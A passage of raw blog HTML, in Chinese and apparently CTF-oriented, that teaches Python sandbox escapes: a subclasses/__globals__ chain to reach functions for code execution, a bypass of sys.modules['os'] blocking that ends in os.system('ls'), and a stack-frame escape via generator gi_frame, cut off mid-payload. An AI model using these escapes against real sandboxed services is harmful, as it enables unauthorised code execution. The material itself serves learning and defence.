0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" 
tabindex=\"-1\" aria-hidden=\"true\" readonly>\"\".__class__.__base__.subclasses__()&#91;\u4e0b\u6807&#93;<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B5695999\">&quot;&quot;<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__class__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">__base__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">subclasses__<\/span><span style=\"color: #999999\">()&#91;<\/span><span style=\"color: #393A34\">\u4e0b\u6807<\/span><span style=\"color: #999999\">&#93;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u901a\u8fc7 __init__ \u53ef\u4ee5\u8bbf\u95ee\u8be5\u7c7b\u7684\u6784\u9020\u51fd\u6570\uff0c\u800c\u51fd\u6570\u5bf9\u8c61\u5c31\u6709 __globals__ \u5c5e\u6027\uff0c\u5c31\u80fd\u83b7\u53d6\u5230\u8be5\u6a21\u5757\u7684\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u3002\u7531\u6b64\u6210\u529f\u5b9e\u73b0 Rce\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" 
data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>\"\".__class__.__base__.subclasses__()&#91;\u4e0b\u6807&#93;.__init__.__globals__&#91;'\u51fd\u6570'&#93;...<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #B5695999\">&quot;&quot;<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__class__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">__base__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">subclasses__<\/span><span style=\"color: #999999\">()&#91;<\/span><span style=\"color: #393A34\">\u4e0b\u6807<\/span><span 
style=\"color: #999999\">&#93;.<\/span><span style=\"color: #998418\">__init__<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #998418\">__globals__<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">\u51fd\u6570<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;<\/span><span style=\"color: #A65E2B\">...<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">sys.modules\u8fc7\u6ee4<\/h4>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>import sys\nsys.modules&#91;'os'&#93; = 'not allowed'<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 
9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #1E754F\">import<\/span><span style=\"color: #393A34\"> sys<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">sys<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">modules<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">os<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">not allowed<\/span><span style=\"color: #B5695999\">&#39;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u76f4\u63a5\u5bf9 sys.modules \u4e0b\u624b\uff0c\u7be1\u6539\u5176\u4e2d\u7684\u6a21\u5757\u5bf9\u8c61\uff0c\u88ab\u7be1\u6539\u7684\u6a21\u5757\u5c31\u5f7b\u5e95\u6ca1\u6cd5\u7528\u4e86\u3002\u6ce8\u610f\u8fd9\u91cc\u4e0d\u80fd\u628a\u5f85\u8fc7\u6ee4\u6a21\u5757\u76f4\u63a5\u5220\u4e86\uff0c\u53ea\u662f\u5220\u9664\u7684\u8bdd import \u7684\u65f6\u5019\u89e3\u91ca\u5668\u4f1a\u76f4\u63a5\u4ece\u6587\u4ef6\u52a0\u8f7d\u3002<\/p>\n\n\n\n<p 
class=\"wp-block-paragraph\">\u8fd9\u91cc\u53ef\u4ee5\u8fd9\u4e48\u7ed5\u8fc7\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>del sys.modules&#91;'os'&#93;\nimport os\nos.system('ls')<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #1E754F\">del<\/span><span style=\"color: #393A34\"> sys<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">modules<\/span><span style=\"color: #999999\">&#91;<\/span><span style=\"color: #B5695999\">&#39;<\/span><span 
style=\"color: #B56959\">os<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">&#93;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #1E754F\">import<\/span><span style=\"color: #393A34\"> os<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">os<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">system<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #B56959\">ls<\/span><span style=\"color: #B5695999\">&#39;<\/span><span style=\"color: #999999\">)<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u5220\u9664\u8be5\u6a21\u5757\u4e4b\u540e\u5c31\u80fd\u5b9e\u73b0\u91cd\u65b0\u52a0\u8f7d\u3002\u56e0\u6b64\u4ec5\u9760\u8986\u76d6 sys.modules \u4e2d\u7684\u6761\u76ee\u5e76\u4e0d\u80fd\u6784\u6210\u5b89\u5168\u8fb9\u754c\u3002<\/p>\n\n\n\n<div style=\"height:45px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h2 class=\"wp-block-heading\">\u6808\u5e27\u9003\u9038<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">\u6808\u5e27<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">\u5728 Python \u4e2d\uff0c<strong>\u6808\u5e27\uff08stack frame\uff09<\/strong>\u662f\u51fd\u6570\u6216\u65b9\u6cd5\u8c03\u7528\u65f6\u4e3a\u6bcf\u4e2a\u8c03\u7528\u521b\u5efa\u7684\u4e00\u4e2a\u5185\u5b58\u7ed3\u6784\u3002\u5b83\u5305\u542b\u4e86\u51fd\u6570\u6267\u884c\u8fc7\u7a0b\u4e2d\u9700\u8981\u7684\u5404\u79cd\u4fe1\u606f\uff0c\u5305\u62ec\u5c40\u90e8\u53d8\u91cf\u3001\u51fd\u6570\u53c2\u6570\u3001\u8fd4\u56de\u5730\u5740\u7b49\u3002\u5f53\u51fd\u6570\u88ab\u8c03\u7528\u65f6\uff0cPython \u4f1a\u5c06\u6808\u5e27\u538b\u5165\u8c03\u7528\u6808\uff0c\u6267\u884c\u5b8c\u6210\u540e\uff0c\u6808\u5e27\u4f1a\u88ab\u5f39\u51fa\u3002<\/p>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 
class=\"wp-block-heading\">\u6808\u5e27\u5bf9\u8c61\u7684\u5185\u7f6e\u5c5e\u6027<\/h4>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(1 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>f_globals: \u5b57\u5178\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u6240\u5728\u6a21\u5757\u7684\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u3002\nf_locals: \u5b57\u5178\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u7684\u5c40\u90e8\u53d8\u91cf\u3002\nf_back: \u6808\u5e27\u5bf9\u8c61\uff0c\u6307\u5411\u4e0a\u4e00\u7ea7\u8c03\u7528\u7684\u6808\u5e27\u3002\nf_code: \u4ee3\u7801\u5bf9\u8c61\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u7684\u5b57\u8282\u7801\u6307\u4ee4\u3001\u5e38\u91cf\u3001\u53d8\u91cf\u7b49\u4fe1\u606f\u3002<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 
006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #393A34\">f_globals<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> \u5b57\u5178\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u6240\u5728\u6a21\u5757\u7684\u5168\u5c40\u547d\u540d\u7a7a\u95f4\u3002<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">f_locals<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> \u5b57\u5178\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u7684\u5c40\u90e8\u53d8\u91cf\u3002<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">f_back<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> \u6808\u5e27\u5bf9\u8c61\uff0c\u6307\u5411\u4e0a\u4e00\u7ea7\u8c03\u7528\u7684\u6808\u5e27\u3002<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">f_code<\/span><span style=\"color: #999999\">:<\/span><span style=\"color: #393A34\"> \u4ee3\u7801\u5bf9\u8c61\uff0c\u5305\u542b\u8be5\u6808\u5e27\u5bf9\u5e94\u51fd\u6570\u6216\u65b9\u6cd5\u7684\u5b57\u8282\u7801\u6307\u4ee4\u3001\u5e38\u91cf\u3001\u53d8\u91cf\u7b49\u4fe1\u606f\u3002<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h4 class=\"wp-block-heading\">\u751f\u6210\u5668\u6355\u6349\u6808\u5e27\u5bf9\u8c61<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">\u751f\u6210\u5668\u662f\u7279\u6b8a\u7684\u51fd\u6570\uff0c\u901a\u8fc7 
<strong>yield<\/strong> \u5173\u952e\u5b57\u6765\u5b9a\u4e49\u3002\u8ddf\u666e\u901a\u51fd\u6570\u7684\u533a\u522b\u5728\u4e8e\uff0c\u751f\u6210\u5668\u51fd\u6570\u6bcf\u6b21\u9047\u5230 yield \u65f6\uff0c\u90fd\u4f1a<strong>\u6682\u505c\u5e76\u4fdd\u5b58\u5f53\u524d\u72b6\u6001<\/strong>\uff08\u5c40\u90e8\u53d8\u91cf\u3001\u6267\u884c\u4f4d\u7f6e\u7b49\uff09\uff0c\u5f53\u4e0b\u6b21\u8c03\u7528 <strong>next()<\/strong> \u65f6\uff0c\u4f1a\u4ece\u4e0a\u6b21\u6682\u505c\u7684\u5730\u65b9\u7ee7\u7eed\u6267\u884c\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>def f():\n \u00a0 \u00a0a = 1\n \u00a0 \u00a0while 1:\n \u00a0 \u00a0 \u00a0 \u00a0yield a\n \u00a0 \u00a0 \u00a0 \u00a0a += 1\n\u200b\nf=f()\nprint(next(f))\nprint(next(f))\n\u200b\n# 1\n# 2<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 
2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #AB5959\">def<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #59873A\">f<\/span><span style=\"color: #999999\">():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0a <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0<\/span><span style=\"color: #1E754F\">while<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><span style=\"color: #999999\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0<\/span><span style=\"color: #1E754F\">yield<\/span><span style=\"color: #393A34\"> a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0a <\/span><span style=\"color: #999999\">+=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #998418\">next<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: 
#998418\">next<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># 2<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">\u751f\u6210\u5668\u6709\u4e00\u4e2a\u5185\u7f6e\u5c5e\u6027 <strong>gi_frame<\/strong>\uff0c\u6307\u5411\u8fd9\u6b21\u8c03\u7528\u6240\u521b\u5efa\u7684\u6808\u5e27\u5bf9\u8c61\u3002<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>def f():\n \u00a0 \u00a0a = 1\n \u00a0 \u00a0while 1:\n \u00a0 \u00a0 \u00a0 \u00a0yield a\n \u00a0 \u00a0 \u00a0 \u00a0a += 1\n\u200b\nf=f()\nprint(f.gi_frame)\n\u200b\n# &lt;frame at 0x74bacb4668e0, file '\/CTF\/Python\/0Test\/test.py', line 1, code 
f><\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki vitesse-light\" style=\"background-color: #ffffff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #AB5959\">def<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #59873A\">f<\/span><span style=\"color: #999999\">():<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0a <\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0<\/span><span style=\"color: #1E754F\">while<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><span style=\"color: #999999\">:<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0<\/span><span style=\"color: #1E754F\">yield<\/span><span style=\"color: #393A34\"> a<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\"> \u00a0 \u00a0 \u00a0 \u00a0a <\/span><span style=\"color: #999999\">+=<\/span><span style=\"color: #393A34\"> <\/span><span style=\"color: #2F798A\">1<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">=<\/span><span style=\"color: #393A34\">f<\/span><span 
style=\"color: #999999\">()<\/span><\/span>\n<span class=\"line\"><span style=\"color: #998418\">print<\/span><span style=\"color: #999999\">(<\/span><span style=\"color: #393A34\">f<\/span><span style=\"color: #999999\">.<\/span><span style=\"color: #393A34\">gi_frame<\/span><span style=\"color: #999999\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #393A34\">\u200b<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A0ADA0\"># &lt;frame at 0x74bacb4668e0, file &#39;\/CTF\/Python\/0Test\/test.py&#39;, line 1, code f&gt;<\/span><\/span><\/code><\/pre><span style=\"display:flex;align-items:flex-end;padding:10px;width:100%;justify-content:flex-end;background-color:#ffffff;color:#464740;font-size:12px;line-height:1;position:relative\">Python<\/span><\/div>\n\n\n\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\">\u6808\u5e27\u9003\u9038\u7684\u5b9e\u73b0<\/h3>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro padding-bottom-disabled cbp-has-line-numbers\" data-code-block-pro-font-family=\"\" style=\"font-size:clamp(16px, 1rem, 24px);--cbp-line-number-color:#393a34;--cbp-line-number-width:calc(2 * 0.6 * 1rem);line-height:clamp(24px, 1.5rem, 36px);--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:flex;align-items:center;padding:10px 0px 10px 16px;margin-bottom:-2px;width:100%;text-align:left;background-color:#f2f2f2;color:#464740\">Python<\/span><span role=\"button\" tabindex=\"0\" style=\"color:#393a34;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>test.py\n\u200b\nflag=\"flagflag\"\npayload='''\ndef f():\n \u00a0  yield 